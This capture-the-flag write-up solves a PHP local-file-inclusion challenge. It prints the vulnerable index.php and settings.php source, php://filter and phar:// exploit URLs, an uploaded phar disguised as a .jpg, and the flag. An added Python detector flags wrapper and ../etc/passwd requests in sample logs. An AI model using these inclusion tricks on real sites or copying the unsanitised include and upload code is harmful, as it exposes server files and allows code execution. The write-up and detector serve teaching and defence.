This problem has an LFI (local file inclusion) vulnerability.
Problem page: http://magiagents.chal.mmactf.link/
The vulnerable point is 'index.php?page='.
The settings page has a file upload.
First, I got the PHP source with the php://filter wrapper:
http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home
// home.php
<div class="page-header"><h1>Home</h1></div>
<img src="magi.jpg">
<?php
if (isset($_SESSION["admin"]) && $_SESSION["admin"]) {
    echo file_get_contents("../flag");
}
// index.php
<?php
session_start();
if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
  <meta name="description" content="">
  <meta name="author" content="">
  <link rel="icon" href="favicon.ico">
  <title>Mortal Magi Agents</title>
  <!-- Bootstrap core CSS -->
  <link href="css/bootstrap.min.css" rel="stylesheet">
  <!-- Custom styles for this template -->
  <link href="css/jumbotron.css" rel="stylesheet">
  <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
  <!--[if lt IE 9]>
  <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
  <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
  <![endif]-->
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
    </div>
    <div id="navbar" class="collapse navbar-collapse">
      <ul class="nav navbar-nav">
        <li class="active"><a href="?page=home">Home</a></li>
        <li><a href="?page=news">News</a></li>
        <li><a href="#contact">Contact</a></li>
      </ul>
      <?php if (isset($_SESSION["user"])) { ?>
      <ul class="nav navbar-nav navbar-right">
        <li class='dropdown'>
          <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
            <?php if (isset($_SESSION["avator"])) { echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">'; } echo $_SESSION["user"]; ?><span class='caret'></span></a>
          <ul class='dropdown-menu' role='menu'>
            <li><a href="?page=settings">Settings</a></li>
            <li><a href="logout.php">Sign out</a></li>
          </ul>
        </li>
      </ul>
      <?php } else { ?>
      <form class="navbar-form navbar-right" action="login.php" method="post">
        <div class="form-group">
          <input type="text" placeholder="User" class="form-control" name="user">
        </div>
        <div class="form-group">
          <input type="password" placeholder="Password" class="form-control" name="password">
        </div>
        <button type="submit" class="btn btn-success" name="signin">Sign in</button>
        <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
      </form>
      <?php } ?>
    </div><!--/.nav-collapse -->
  </div>
</nav>
<!-- Main jumbotron for a primary marketing message or call to action -->
<!-- <div class="jumbotron"> </div> -->
<div class="container">
  <?php include("$page.php"); ?>
</div>
<hr>
<footer>
  <p>Mortal Magi Agents 2015</p>
</footer>
</div> <!-- /container -->
<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>
// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    } else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    } else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php if (isset($_SESSION["avator"])) { ?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php } ?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
  <input type="file" name="file">
  <input type="submit">
</form>
The uploaded file is saved as 'user' + sha1 of the file contents + extension.
But this name is no problem: the resulting path is echoed back as the avatar image src.
I used the phar:// wrapper: the uploaded .jpg is a phar archive containing getflag.php.
getflag.php:
<?php echo file_get_contents('../flag'); ?>
http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag
MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
Good
Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
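As an added example (my own defender-side code, not the author's solution and not part of the challenge), here is a Python script covering the two points the writeup turns on: an allowlist resolver that replaces the include("$page.php") pattern, and a detector run over constructed Apache-style access-log lines that flags page= values carrying PHP stream wrappers (php://filter, phar://) or directory traversal. The allowlist (taken from the nav links in the dumped source), the log lines, the IPs, the avatar-hash placeholder and the function names are all assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed allowlist of pages index.php should be able to include,
# taken from the nav links in the dumped source (constructed for this example).
ALLOWED_PAGES = {"home", "news", "settings"}

# PHP stream wrappers that never belong in a page-name parameter.
WRAPPER_RE = re.compile(
    r"^\s*(php|phar|data|zip|glob|expect|file|ftp|https?|compress\.\w+)://", re.I
)

# Combined-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_page_param(value: str) -> str:
    """Classify a raw ?page= value as 'ok', 'wrapper', 'traversal' or 'unknown'."""
    v = unquote(value)                       # decode %2F, %00 and friends first
    if WRAPPER_RE.match(v):
        return "wrapper"                     # php://filter, phar://, data:// ...
    if "/" in v or "\\" in v or ".." in v or "\x00" in v:
        return "traversal"                   # leaves the intended directory
    return "ok" if v in ALLOWED_PAGES else "unknown"


def resolve_page(value: str) -> str:
    """Allowlist replacement for include("$page.php"): unknown names fall back to home."""
    return value if value in ALLOWED_PAGES else "home"


def scan_access_log(lines):
    """Return (client_ip, verdict, decoded_value) for every suspicious page= parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # not a request line we understand
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get("page", []):
            verdict = classify_page_param(value)
            if verdict != "ok":
                findings.append((m.group("ip"), verdict, unquote(value)))
    return findings


# Constructed sample log lines (hypothetical IPs; the avatar hash is a placeholder).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2015:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2410',
    '10.0.0.9 - - [05/Sep/2015:10:00:07 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=home HTTP/1.1" 200 3890',
    '10.0.0.9 - - [05/Sep/2015:10:01:30 +0000] "GET /?page=phar:///var/www/html/avators/USER_SHA1_PLACEHOLDER.jpg/getflag HTTP/1.1" 200 2455',
    '10.0.0.9 - - [05/Sep/2015:10:02:02 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2501',
]

if __name__ == "__main__":
    for ip, verdict, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value}")
```

The wrapper check is the part a traversal-only filter misses: neither php://filter nor phar:// contains "..", and phar:// works on an uploaded archive regardless of its .jpg extension, which is exactly the path the writeup took. Strict allowlisting of the page name, as in resolve_page, closes both routes at once.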